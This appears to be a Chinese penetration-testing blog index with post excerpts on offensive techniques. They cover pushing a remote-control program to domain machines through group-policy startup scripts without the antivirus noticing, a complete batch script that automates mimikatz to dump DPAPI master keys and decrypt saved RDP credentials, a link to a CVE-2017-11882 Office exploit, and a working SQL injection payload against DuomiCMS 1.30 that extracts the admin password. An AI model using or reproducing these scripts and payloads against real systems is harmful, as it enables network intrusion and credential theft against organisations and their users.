0%

0x01 背景

内网渗透中,当控制到域控时,当然是再好不过,但如何控制成员机器或个人机呢,域管理员账号登录?太敏感,动作大;psexec,wmi…?杀软报毒,不要不信,亲身经历;

想要直接推送个远控,神不知鬼不觉的搞定成员;

那么问题来了,如何推送个exe?

0x02 研究

方法1

查找大量相关资料,都没有现成的方法直接下发exe,然而吐司竟然也没有,最后,锁定了组策略开机脚本

域成员登录时,执行域控提前部署好的bat脚本,通过此脚本,IPC连接到域控,copy文件,在成员上执行。

阅读全文 »

前言

【奇技淫巧】破解远程终端凭据,获取服务器密码

想必大家都看了这篇文章吧,土司12月推送的,非常好的破解方式,内网中能起到相当大的作用,相信不少人已经去实践了一遍,过程之繁琐真是让我们这些人望而却步。

我可不想每拿到一台内网机,都要重复的去做这么复杂的操作,而且每一个凭据都要做一遍。

对批处理不熟,花了几天时间,写了个bat,一键批量获取。

Code

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
@echo off
setlocal enabledelayedexpansion

echo.
echo [+] Start. Code by redn3ck.
echo.

set flag=0 REM 判断是否存在Credentials
for /f %%i in ('dir /a/s/b c:\Users\Administrator\AppData\Local\Microsoft\Credentials') do (
if exist %%i (
set file=%%i
set flag=1
echo !file!

for /f "delims=: tokens=1,2" %%i in ('mimikatz.exe "dpapi::cred /in:!file!" "exit" ^| findstr guidMasterKey') do set guidMasterKey=%%j
REM echo !guidMasterKey!

mimikatz "privilege::debug" "sekurlsa::dpapi" "exit" > MasterKey.txt

REM findstr /n 返回行号 example: 1: * GUID : {b619a08d-f4c3-408d-b733-bc89bd94ca0b}
for /f "delims=:" %%i in ('findstr /n "!guidMasterKey!" MasterKey.txt') do (
set /a lineNum=%%i+1
REM echo !lineNum!
call :next
)
)
)
:end
if !flag!==0 echo [-] No credentials :(
echo.
echo [+] End
exit /b

:next
for /f "skip=%lineNum% delims=" %%i in ('type MasterKey.txt') do (
set MasterKeyTemp=%%i
goto next2
)

:next2
set MasterKey=%MasterKeyTemp:~16%
REM echo %MasterKey%
mimikatz "dpapi::cred /in:%file% /masterkey:%MasterKey%" "exit" > pass.txt
findstr "TargetName UserName CredentialBlob" pass.txt
del MasterKey.txt

阅读全文 »

POC

https://github.com/embedi/CVE-2017-11882

如何使用,作者github里写的很清楚

附上自测gif

BTW

现在此漏洞被冠上全版本通杀的名号,作者也放出3个版本的视频,但我本地测试,却在2016下未成功

具体环境:win10 [10.0.16299.64] + 破解激活过的office2016

变量覆盖导致注入

  1. 漏洞页面:\member\invitation.php

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    if($dm=='yq')
    {
    $ccgid=$_SESSION['duomi_user_group'];
    $ccuid=$_SESSION['duomi_user_id'];
    $cc1=$dsql->GetOne("select * from duomi_member_group where gid=$ccgid");
    $ccgroup=$cc1['gname'];
    $cc2=$dsql->GetOne("select * from duomi_member where id=$ccuid");
    $ccjifen=$cc2['points'];
    $ccemail=$cc2['email'];
    $cclog=$cc2['logincount'];

    $ccgid,$ccuid均无任何过滤直接带入查询,由于变量覆盖导致此处两个变量均可控制

    该cms采用80sec通用防注入,网上公开方法即可绕过。

    利用:来到member页面,随便注册一个用户,test,登入。

    1
    2
    3
    payload:
    http://127.0.0.1/duomicms_1.30/member/invitation.php
    _SESSION[duomi_user_id]=@`'` or updatexml(1, concat(0x7c, (select password from duomi_admin)), 3) and 1=@`'`&_SESSION[duomi_user_group]=1

    注出管理员密码

阅读全文 »